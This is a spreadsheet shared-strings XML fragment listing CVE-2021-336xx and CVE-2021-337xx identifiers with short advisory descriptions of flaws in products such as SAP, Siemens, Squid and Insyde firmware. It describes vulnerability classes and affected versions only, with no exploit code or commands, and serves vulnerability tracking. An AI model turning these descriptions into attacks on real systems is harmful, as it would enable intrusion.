  <si>
    <t>Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server.</t>
  </si>
  <si>
    <t>CVE-2021-33621</t>
  </si>
  <si>
    <t>The cgi gem before 0.1.0.2, 0.2.x before 0.2.2, and 0.3.x before 0.3.5 for Ruby allows HTTP response splitting. This is relevant to applications that use untrusted user input either to generate an HTTP response or to create a CGI::Cookie object.</t>
  </si>
  <si>
    <t>CVE-2021-33622</t>
  </si>
  <si>
    <t>Sylabs Singularity 3.5.x and 3.6.x, and SingularityPRO before 3.5-8, has an Incorrect Check of a Function's Return Value.</t>
  </si>
  <si>
    <t>CVE-2021-33623</t>
  </si>
  <si>
    <t>The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.</t>
  </si>
  <si>
    <t>CVE-2021-33624</t>
  </si>
  <si>
    <t>In kernel/bpf/verifier.c in the Linux kernel before 5.12.13, a branch can be mispredicted (e.g., because of type confusion) and consequently an unprivileged BPF program can read arbitrary memory locations via a side-channel attack, aka CID-9183671af6db.</t>
  </si>
  <si>
    <t>CVE-2021-33625</t>
  </si>
  <si>
    <t>An issue was discovered in Kernel 5.x in Insyde InsydeH2O, affecting HddPassword. Software SMI services that use the Communicate() function of the EFI_SMM_COMMUNICATION_PROTOCOL do not check whether the address of the buffer is valid, which allows use of SMRAM, MMIO, or OS kernel addresses.</t>
  </si>
  <si>
    <t>CVE-2021-33626</t>
  </si>
  <si>
    <t>A vulnerability exists in SMM (System Management Mode) branch that registers a SWSMI handler that does not sufficiently check or validate the allocated buffer pointer(QWORD values for CommBuffer). This can be used by an attacker to corrupt data in SMRAM memory and even lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-33627</t>
  </si>
  <si>
    <t>An issue was discovered in Insyde InsydeH2O 5.x, affecting FwBlockServiceSmm. Software SMI services that use the Communicate() function of the EFI_SMM_COMMUNICATION_PROTOCOL do not check whether the address of the buffer is valid, which allows use of SMRAM, MMIO, or OS kernel addresses</t>
  </si>
  <si>
    <t>CVE-2021-33629</t>
  </si>
  <si>
    <t>isula-build before 0.9.5-6 can cause a program crash, when building container images, some functions for processing external data do not remove spaces when processing data.</t>
  </si>
  <si>
    <t>CVE-2021-33643</t>
  </si>
  <si>
    <t>An attacker who submits a crafted tar file with size in header struct being 0 may be able to trigger an calling of malloc(0) for a variable gnu_longlink, causing an out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2021-33644</t>
  </si>
  <si>
    <t>An attacker who submits a crafted tar file with size in header struct being 0 may be able to trigger an calling of malloc(0) for a variable gnu_longname, causing an out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2021-33645</t>
  </si>
  <si>
    <t>The th_read() function doesn’t free a variable t-&gt;th_buf.gnu_longlink after allocating memory, which may cause a memory leak.</t>
  </si>
  <si>
    <t>CVE-2021-33646</t>
  </si>
  <si>
    <t>The th_read() function doesn’t free a variable t-&gt;th_buf.gnu_longname after allocating memory, which may cause a memory leak.</t>
  </si>
  <si>
    <t>CVE-2021-33647</t>
  </si>
  <si>
    <t>When performing the inference shape operation of the Tile operator, if the input data type is not int or int32, it will access data outside of bounds of heap allocated buffers.</t>
  </si>
  <si>
    <t>CVE-2021-33648</t>
  </si>
  <si>
    <t>When performing the inference shape operation of Affine, Concat, MatMul, ArgMinMax, EmbeddingLookup, and Gather operators, if the input shape size is 0, it will access data outside of bounds of shape which allocated from heap buffers.</t>
  </si>
  <si>
    <t>CVE-2021-33649</t>
  </si>
  <si>
    <t>When performing the inference shape operation of the Transpose operator, if the value in the perm element is greater than or equal to the size of the input_shape, it will access data outside of bounds of input_shape which allocated from heap buffers.</t>
  </si>
  <si>
    <t>CVE-2021-33650</t>
  </si>
  <si>
    <t>When performing the inference shape operation of the SparseToDense operator, if the number of inputs is less than three, it will access data outside of bounds of inputs which allocated from heap buffers.</t>
  </si>
  <si>
    <t>CVE-2021-33651</t>
  </si>
  <si>
    <t>When performing the analytical operation of the DepthwiseConv2D operator, if the attribute depth_multiplier is 0, it will cause a division by 0 exception.</t>
  </si>
  <si>
    <t>CVE-2021-33652</t>
  </si>
  <si>
    <t>When the Reduce operator run operation is executed, if there is a value of 0 in the parameter axis_sizes element, it will cause a division by 0 exception.</t>
  </si>
  <si>
    <t>CVE-2021-33653</t>
  </si>
  <si>
    <t>When performing the derivation shape operation of the SpaceToBatch operator, if there is a value of 0 in the parameter block_shape element, it will cause a division by 0 exception.</t>
  </si>
  <si>
    <t>CVE-2021-33654</t>
  </si>
  <si>
    <t>When performing the initialization operation of the Split operator, if a dimension in the input shape is 0, it will cause a division by 0 exception.</t>
  </si>
  <si>
    <t>CVE-2021-33655</t>
  </si>
  <si>
    <t>When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.</t>
  </si>
  <si>
    <t>CVE-2021-33656</t>
  </si>
  <si>
    <t>When setting font with malicous data by ioctl cmd PIO_FONT,kernel will write memory out of bounds.</t>
  </si>
  <si>
    <t>CVE-2021-33657</t>
  </si>
  <si>
    <t>There is a heap overflow problem in video/SDL_pixels.c in SDL (Simple DirectMedia Layer) 2.x to 2.0.18 versions. By crafting a malicious .BMP file, an attacker can cause the application using this library to crash, denial of service or Code execution.</t>
  </si>
  <si>
    <t>CVE-2021-33658</t>
  </si>
  <si>
    <t>atune before 0.3-0.8 log in as a local user and run the curl command to access the local atune url interface to escalate the local privilege or modify any file. Authentication is not forcibly enabled in the default configuration.</t>
  </si>
  <si>
    <t>CVE-2021-33659</t>
  </si>
  <si>
    <t>CVE-2021-33660</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated FLI file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2021-33661</t>
  </si>
  <si>
    <t>CVE-2021-33662</t>
  </si>
  <si>
    <t>Under certain conditions, the installation of SAP Business One, version - 10.0, discloses sensitive information on the file system allowing an attacker to access information which would otherwise be restricted.</t>
  </si>
  <si>
    <t>CVE-2021-33663</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP, versions - KRNL32NUC - 7.22,7.22EXT, KRNL32UC - 7.22,7.22EXT, KRNL64NUC - 7.22,7.22EXT,7.49, KRNL64UC - 8.04,7.22,7.22EXT,7.49,7.53,7.73, KERNEL - 7.22,8.04,7.49,7.53,7.73,7.77,7.81,7.82,7.83,7.84, allows an unauthorized attacker to insert cleartext commands due to improper restriction of I/O buffering into encrypted SMTP sessions over the network which can partially impact the integrity of the application.</t>
  </si>
  <si>
    <t>CVE-2021-33664</t>
  </si>
  <si>
    <t>SAP NetWeaver Application Server ABAP (Applications based on Web Dynpro ABAP), versions - SAP_UI - 750,752,753,754,755, SAP_BASIS - 702, 731 does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33665</t>
  </si>
  <si>
    <t>SAP NetWeaver Application Server ABAP (Applications based on SAP GUI for HTML), versions - KRNL64NUC - 7.49, KRNL64UC - 7.49,7.53, KERNEL - 7.49,7.53,7.77,7.81,7.84, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33666</t>
  </si>
  <si>
    <t>When SAP Commerce Cloud version 100, hosts a JavaScript storefront, it is vulnerable to MIME sniffing, which, in certain circumstances, could be used to facilitate an XSS attack or malware proliferation.</t>
  </si>
  <si>
    <t>CVE-2021-33667</t>
  </si>
  <si>
    <t>Under certain conditions, SAP Business Objects Web Intelligence (BI Launchpad) versions - 420, 430, allows an attacker to access jsp source code, through SDK calls, of Analytical Reporting bundle, a part of the frontend application, which would otherwise be restricted.</t>
  </si>
  <si>
    <t>CVE-2021-33668</t>
  </si>
  <si>
    <t>Due to improper input sanitization, specially crafted LDAP queries can be injected by an unauthenticated user. This could partially impact the confidentiality of the application.</t>
  </si>
  <si>
    <t>CVE-2021-33669</t>
  </si>
  <si>
    <t>Under certain conditions, SAP Mobile SDK Certificate Provider allows a local unprivileged attacker to exploit an insecure temporary file storage. For a successful exploitation user interaction from another user is required and could lead to complete impact of confidentiality integrity and availability.</t>
  </si>
  <si>
    <t>CVE-2021-33670</t>
  </si>
  <si>
    <t>SAP NetWeaver AS for Java (Http Service Monitoring Filter), versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, allows an attacker to send multiple HTTP requests with different method types thereby crashing the filter and making the HTTP server unavailable to other legitimate users leading to denial of service vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33671</t>
  </si>
  <si>
    <t>SAP NetWeaver Guided Procedures (Administration Workset), versions - 7.10, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. The impact of missing authorization could result to abuse of functionality restricted to a particular user group, and could allow unauthorized users to read, modify or delete restricted data.</t>
  </si>
  <si>
    <t>CVE-2021-33672</t>
  </si>
  <si>
    <t>Due to missing encoding in SAP Contact Center's Communication Desktop component- version 700, an attacker could send malicious script in chat message. When the message is accepted by the chat recipient, the script gets executed in their scope. Due to the usage of ActiveX in the application, the attacker can further execute operating system level commands in the chat recipient's scope. This could lead to a complete compromise of their confidentiality, integrity, and could temporarily impact their availability.</t>
  </si>
  <si>
    <t>CVE-2021-33673</t>
  </si>
  <si>
    <t>Under certain conditions, SAP Contact Center - version 700,does not sufficiently encode user-controlled inputs and persists in them. This allows an attacker to exploit a Stored Cross-Site Scripting (XSS) vulnerability when a user browses through the employee directory and to execute arbitrary code on the victim's browser. Due to the usage of ActiveX in the application, the attacker can further execute operating system level commands.</t>
  </si>
  <si>
    <t>CVE-2021-33674</t>
  </si>
  <si>
    <t>Under certain conditions, SAP Contact Center - version 700, does not sufficiently encode user-controlled inputs. This allows an attacker to exploit a Reflected Cross-Site Scripting (XSS) vulnerability when creating a new email and to execute arbitrary code on the victim's browser.</t>
  </si>
  <si>
    <t>CVE-2021-33675</t>
  </si>
  <si>
    <t>Under certain conditions, SAP Contact Center - version 700, does not sufficiently encode user-controlled inputs. This allows an attacker to exploit a Reflected Cross-Site Scripting (XSS) vulnerability through phishing and to execute arbitrary code on the victim's browser.</t>
  </si>
  <si>
    <t>CVE-2021-33676</t>
  </si>
  <si>
    <t>A missing authority check in SAP CRM, versions - 700, 701, 702, 712, 713, 714, could be leveraged by an attacker with high privileges to compromise confidentiality, integrity, or availability of the system.</t>
  </si>
  <si>
    <t>CVE-2021-33677</t>
  </si>
  <si>
    <t>SAP NetWeaver ABAP Server and ABAP Platform, versions - 700, 702, 730, 731, 804, 740, 750, 784, expose functions to external which can lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-33678</t>
  </si>
  <si>
    <t>A function module of SAP NetWeaver AS ABAP (Reconciliation Framework), versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B, 75C, 75D, 75E, 75F, allows a high privileged attacker to inject code that can be executed by the application. An attacker could thereby delete some critical information and could make the SAP system completely unavailable.</t>
  </si>
  <si>
    <t>95</t>
  </si>
  <si>
    <t>CVE-2021-33679</t>
  </si>
  <si>
    <t>The SAP BusinessObjects BI Platform version - 420 allows an attacker, who has basic access to the application, to inject a malicious script while creating a new module document, file, or folder. When another user visits that page, the stored malicious script will execute in their session, hence allowing the attacker to compromise their confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-33680</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated CGM file received from untrusted sources which causes buffer overflow and causes the application to crash and becoming temporarily unavailable until the user restarts the application.</t>
  </si>
  <si>
    <t>CVE-2021-33681</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated CGM file received from untrusted sources which causes out of bounds write and causes the application to crash and becoming temporarily unavailable until the user restarts the application.</t>
  </si>
  <si>
    <t>CVE-2021-33682</t>
  </si>
  <si>
    <t>SAP Lumira Server version 2.4 does not sufficiently encode user controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. This would allow an attacker with basic level privileges to store a malicious script on SAP Lumira Server. The execution of the script content, by a victim registered on SAP Lumira Server, could compromise the confidentiality and integrity of SAP Lumira content.</t>
  </si>
  <si>
    <t>CVE-2021-33683</t>
  </si>
  <si>
    <t>SAP Web Dispatcher and Internet Communication Manager (ICM), versions - KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, KRNL64UC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.53, 7.73, WEBDISP 7.53, 7.73, 7.77, 7.81, 7.82, 7.83, KERNEL 7.21, 7.22, 7.49, 7.53, 7.73, 7.77, 7.81, 7.82, 7.83, process invalid HTTP header. The incorrect handling of the invalid Transfer-Encoding header in a particular manner leads to a possibility of HTTP Request Smuggling attack. An attacker could exploit this vulnerability to bypass web application firewall protection, divert sensitive data such as customer requests, session credentials, etc.</t>
  </si>
  <si>
    <t>CVE-2021-33684</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP and ABAP Platform, versions - KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, KRNL64UC 8.04, 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 8.04, 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.53, 7.77, 7.81, 7.84, allows an attacker to send overlong content in the RFC request type thereby crashing the corresponding work process because of memory corruption vulnerability. The work process will attempt to restart itself after the crash and hence the impact on the availability is low.</t>
  </si>
  <si>
    <t>CVE-2021-33685</t>
  </si>
  <si>
    <t>SAP Business One version - 10.0 allows low-level authorized attacker to traverse the file system to access files or directories that are outside of the restricted directory. A successful attack allows access to high level sensitive data</t>
  </si>
  <si>
    <t>CVE-2021-33686</t>
  </si>
  <si>
    <t>Under certain conditions, SAP Business One version - 10.0, allows an unauthorized attacker to get access to some encrypted sensitive information, but does not have control over kind or degree.</t>
  </si>
  <si>
    <t>CVE-2021-33687</t>
  </si>
  <si>
    <t>SAP NetWeaver AS JAVA (Enterprise Portal), versions - 7.10, 7.20, 7.30, 7.31, 7.40, 7.50 reveals sensitive information in one of their HTTP requests, an attacker can use this in conjunction with other attacks such as XSS to steal this information.</t>
  </si>
  <si>
    <t>CVE-2021-33688</t>
  </si>
  <si>
    <t>SAP Business One allows an attacker with business privileges to execute crafted database queries, exposing the back-end database. Due to framework restrictions, only some information can be obtained.</t>
  </si>
  <si>
    <t>CVE-2021-33689</t>
  </si>
  <si>
    <t>When user with insufficient privileges tries to access any application in SAP NetWeaver Administrator (Administrator applications), version - 7.50, no security audit log is created. Therefore, security audit log Integrity is impacted.</t>
  </si>
  <si>
    <t>CVE-2021-33690</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.</t>
  </si>
  <si>
    <t>CVE-2021-33691</t>
  </si>
  <si>
    <t>NWDI Notification Service versions - 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.SAP NetWeaver Development Infrastructure Notification Service allows a threat actor to send crafted scripts to a victim. If the victim has an active session when the crafted script gets executed, the threat actor could compromise information in victims session, and gain access to some sensitive information also.</t>
  </si>
  <si>
    <t>CVE-2021-33692</t>
  </si>
  <si>
    <t>SAP Cloud Connector, version - 2.0, allows the upload of zip files as backup. This backup file can be tricked to inject special elements such as '..' and '/' separators, for attackers to escape outside of the restricted location to access files or directories.</t>
  </si>
  <si>
    <t>CVE-2021-33693</t>
  </si>
  <si>
    <t>SAP Cloud Connector, version - 2.0, allows an authenticated administrator to modify a configuration file to inject malicious codes that could potentially lead to OS command execution.</t>
  </si>
  <si>
    <t>CVE-2021-33694</t>
  </si>
  <si>
    <t>SAP Cloud Connector, version - 2.0, does not sufficiently encode user-controlled inputs, allowing an attacker with Administrator rights, to include malicious codes that get stored in the database, and when accessed, could be executed in the application, resulting in Stored Cross-Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2021-33695</t>
  </si>
  <si>
    <t>Potentially, SAP Cloud Connector, version - 2.0 communication with the backend is accepted without sufficient validation of the certificate.</t>
  </si>
  <si>
    <t>CVE-2021-33696</t>
  </si>
  <si>
    <t>SAP BusinessObjects Business Intelligence Platform (Crystal Report), versions - 420, 430, does not sufficiently encode user controlled inputs and therefore an authorized attacker can exploit a XSS vulnerability, leading to non-permanently deface or modify displayed content from a Web site.</t>
  </si>
  <si>
    <t>CVE-2021-33697</t>
  </si>
  <si>
    <t>Under certain conditions, SAP BusinessObjects Business Intelligence Platform (SAPUI5), versions - 420, 430, can allow an unauthenticated attacker to redirect users to a malicious site due to Reverse Tabnabbing vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2021-33698</t>
  </si>
  <si>
    <t>SAP Business One, version - 10.0, allows an attacker with business authorization to upload any files (including script files) without the proper file format validation.</t>
  </si>
  <si>
    <t>CVE-2021-33699</t>
  </si>
  <si>
    <t>Task Hijacking is a vulnerability that affects the applications running on Android devices due to a misconfiguration in their AndroidManifest.xml with their Task Control features. This allows an unauthorized attacker or malware to takeover legitimate apps and to steal user's sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-3370</t>
  </si>
  <si>
    <t>DouPHP v1.6 was discovered to contain a cross-site scripting (XSS) vulnerability via /admin/cloud.php.</t>
  </si>
  <si>
    <t>CVE-2021-33700</t>
  </si>
  <si>
    <t>SAP Business One, version - 10.0, allows a local attacker with access to the victim's browser under certain circumstances, to login as the victim without knowing his/her password. The attacker could so obtain highly sensitive information which the attacker could use to take substantial control of the vulnerable application.</t>
  </si>
  <si>
    <t>CVE-2021-33701</t>
  </si>
  <si>
    <t>DMIS Mobile Plug-In or SAP S/4HANA, versions - DMIS 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 710, 2011_1_731, 710, 2011_1_752, 2020, SAPSCORE 125, S4CORE 102, 102, 103, 104, 105, allows an attacker with access to highly privileged account to execute manipulated query in NDZT tool to gain access to Superuser account, leading to SQL Injection vulnerability, that highly impacts systems Confidentiality, Integrity and Availability.</t>
  </si>
  <si>
    <t>CVE-2021-33702</t>
  </si>
  <si>
    <t>Under certain conditions, NetWeaver Enterprise Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode report data. An attacker can craft malicious data and print it to the report. In a successful attack, a victim opens the report, and the malicious script gets executed in the victim's browser, resulting in a Stored Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33703</t>
  </si>
  <si>
    <t>Under certain conditions, NetWeaver Enterprise Portal, versions - 7.30, 7.31, 7.40, 7.50, does not sufficiently encode URL parameters. An attacker can craft a malicious link and send it to a victim. A successful attack results in Reflected Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33704</t>
  </si>
  <si>
    <t>The Service Layer of SAP Business One, version - 10.0, allows an authenticated attacker to invoke certain functions that would otherwise be restricted to specific users. For an attacker to discover the vulnerable function, no in-depth system knowledge is required. Once exploited via Network stack, the attacker may be able to read, modify or delete restricted data. The impact is that missing authorization can result of abuse of functionality usually restricted to specific users.</t>
  </si>
  <si>
    <t>CVE-2021-33705</t>
  </si>
  <si>
    <t>The SAP NetWeaver Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, component Iviews Editor contains a Server-Side Request Forgery (SSRF) vulnerability which allows an unauthenticated attacker to craft a malicious URL which when clicked by a user can make any type of request (e.g. POST, GET) to any internal or external server. This can result in the accessing or modification of data accessible from the Portal but will not affect its availability.</t>
  </si>
  <si>
    <t>CVE-2021-33706</t>
  </si>
  <si>
    <t>Due to improper input validation in InfraBox, logs can be modified by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2021-33707</t>
  </si>
  <si>
    <t>SAP NetWeaver Knowledge Management allows remote attackers to redirect users to arbitrary websites and conduct phishing attacks via a URL stored in a component. This could enable the attacker to compromise the user's confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-33708</t>
  </si>
  <si>
    <t>Due to insufficient input validation in Kyma, authenticated users can pass a Header of their choice and escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-33709</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Teamcenter Active Workspace V4 (All versions &lt; V4.3.9), Teamcenter Active Workspace V5.0 (All versions &lt; V5.0.7), Teamcenter Active Workspace V5.1 (All versions &lt; V5.1.4). By sending malformed requests, a remote attacker could leak an application token due to an error not properly handled by the system.</t>
  </si>
  <si>
    <t>CVE-2021-33710</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Teamcenter Active Workspace V4 (All versions &lt; V4.3.9), Teamcenter Active Workspace V5.0 (All versions &lt; V5.0.7), Teamcenter Active Workspace V5.1 (All versions &lt; V5.1.4). A reflected cross-site scripting (XSS) vulnerability exists in the web interface of the affected devices that could allow an attacker to execute malicious JavaScript code by tricking users into accessing a malicious link.</t>
  </si>
  <si>
    <t>CVE-2021-33711</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Teamcenter Active Workspace V4 (All versions &lt; V4.3.9), Teamcenter Active Workspace V5.0 (All versions &lt; V5.0.7), Teamcenter Active Workspace V5.1 (All versions &lt; V5.1.4). The affected application allows verbose error messages which allow leaking of sensitive information, such as full paths.</t>
  </si>
  <si>
    <t>CVE-2021-33712</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Mendix SAML Module (All versions &lt; V2.1.2). The configuration of the SAML module does not properly check various restrictions and validations imposed by an identity provider. This could allow a remote authenticated attacker to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-33713</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT Utilities (All versions &lt; V13.0.2.0). When parsing specially crafted JT files, a hash function is called with an incorrect argument leading the application to crash. An attacker could leverage this vulnerability to cause a Denial-of-Service condition in the application.</t>
  </si>
  <si>
    <t>CVE-2021-33714</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT Utilities (All versions &lt; V13.0.2.0). When parsing specially crafted JT files, a missing check for the validity of an iterator leads to NULL pointer deference condition, causing the application to crash. An attacker could leverage this vulnerability to cause a Denial-of-Service condition in the application.</t>
  </si>
  <si>
    <t>CVE-2021-33715</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT Utilities (All versions &lt; V13.0.2.0). When parsing specially crafted JT files, a race condition could cause an object to be released before being operated on, leading to NULL pointer deference condition and causing the application to crash. An attacker could leverage this vulnerability to cause a Denial-of-Service condition in the application.</t>
  </si>
  <si>
    <t>CVE-2021-33716</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC CP 1543-1 (incl. SIPLUS variants) (All versions &lt; V3.0), SIMATIC CP 1545-1 (All versions &lt; V1.1). An attacker with access to the subnet of the affected device could retrieve sensitive information stored in cleartext.</t>
  </si>
  <si>
    <t>CVE-2021-33717</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2.0.1), Teamcenter Visualization (All versions &lt; V13.2.0.1). When parsing specially crafted CGM Files, a NULL pointer deference condition could cause the application to crash. The application must be restarted to restore the service. An attacker could leverage this vulnerability to cause a Denial-of-Service condition in the application.</t>
  </si>
  <si>
    <t>CVE-2021-33718</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Mendix Applications using Mendix 7 (All versions &lt; V7.23.22), Mendix Applications using Mendix 8 (All versions &lt; V8.18.7), Mendix Applications using Mendix 9 (All versions &lt; V9.3.0). Write access checks of attributes of an object could be bypassed, if user has a write permissions to the first attribute of this object.</t>
  </si>
  <si>
    <t>CVE-2021-33719</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIPROTEC 5 relays with CPU variants CP050 (All versions &lt; V8.80), SIPROTEC 5 relays with CPU variants CP100 (All versions &lt; V8.80), SIPROTEC 5 relays with CPU variants CP300 (All versions &lt; V8.80). Specially crafted packets sent to port 4443/tcp could cause a Denial-of-Service condition or potential remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-33720</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIPROTEC 5 relays with CPU variants CP050 (All versions &lt; V8.80), SIPROTEC 5 relays with CPU variants CP100 (All versions &lt; V8.80), SIPROTEC 5 relays with CPU variants CP300 (All versions &lt; V8.80). Specially crafted packets sent to port 4443/tcp could cause a Denial-of-Service condition.</t>
  </si>
  <si>
    <t>CVE-2021-33721</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2). The affected application incorrectly neutralizes special elements when creating batch operations which could lead to command injection. An authenticated remote attacker with administrative privileges could exploit this vulnerability to execute arbitrary code on the system with system privileges.</t>
  </si>
  <si>
    <t>CVE-2021-33722</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). The affected system has a Path Traversal vulnerability when exporting a firmware container. With this a privileged authenticated attacker could create arbitrary files on an affected system.</t>
  </si>
  <si>
    <t>CVE-2021-33723</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). An authenticated attacker could change the user profile of any user without proper authorization. With this, the attacker could change the password of any user in the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-33724</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). The affected system contains an Arbitrary File Deletion vulnerability that possibly allows to delete an arbitrary file or directory under a user controlled path.</t>
  </si>
  <si>
    <t>CVE-2021-33725</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). The affected system allows to delete arbitrary files or directories under a user controlled path and does not correctly check if the relative path is still within the intended target directory.</t>
  </si>
  <si>
    <t>CVE-2021-33726</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). The affected system allows to download arbitrary files under a user controlled path and does not correctly check if the relative path is still within the intended target directory.</t>
  </si>
  <si>
    <t>CVE-2021-33727</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). An authenticated attacker could download the user profile of any user. With this, the attacker could leak confidential information of any user in the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-33728</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). The affected system allows to upload JSON objects that are deserialized to JAVA objects. Due to insecure deserialization of user-supplied content by the affected software, a privileged attacker could exploit this vulnerability by sending a crafted serialized Java object. An exploit could allow the attacker to execute arbitrary code on the device with root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-33729</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). An authenticated attacker that is able to import firmware containers to an affected system could execute arbitrary commands in the local database.</t>
  </si>
  <si>
    <t>CVE-2021-33730</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the webserver of the affected application.</t>
  </si>
  <si>
    <t>CVE-2021-33731</t>
  </si>
  <si>
    <t>CVE-2021-33732</t>
  </si>
  <si>
    <t>CVE-2021-33733</t>
  </si>
  <si>
    <t>CVE-2021-33734</t>
  </si>
  <si>
    <t>CVE-2021-33735</t>
  </si>
  <si>
    <t>CVE-2021-33736</t>
  </si>
  <si>
    <t>CVE-2021-33737</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC CP 343-1 (incl. SIPLUS variants) (All versions), SIMATIC CP 343-1 Advanced (incl. SIPLUS variants) (All versions), SIMATIC CP 343-1 ERPC (All versions), SIMATIC CP 343-1 Lean (incl. SIPLUS variants) (All versions), SIMATIC CP 443-1 (incl. SIPLUS variants) (All versions), SIMATIC CP 443-1 Advanced (All versions), SIMATIC CP 443-1 Advanced (incl. SIPLUS variants) (All versions), SIPLUS NET CP 443-1 Advanced (All versions). Sending a specially crafted packet to port 102/tcp of an affected device could cause a denial of service condition. A restart is needed to restore normal operations.</t>
  </si>
  <si>
    <t>CVE-2021-33738</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2.0.2), Teamcenter Visualization (All versions &lt; V13.2.0.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing PAR files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13405)</t>
  </si>
  <si>
    <t>CVE-2021-33739</t>
  </si>
  <si>
    <t>Microsoft DWM Core Library Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3374</t>
  </si>
  <si>
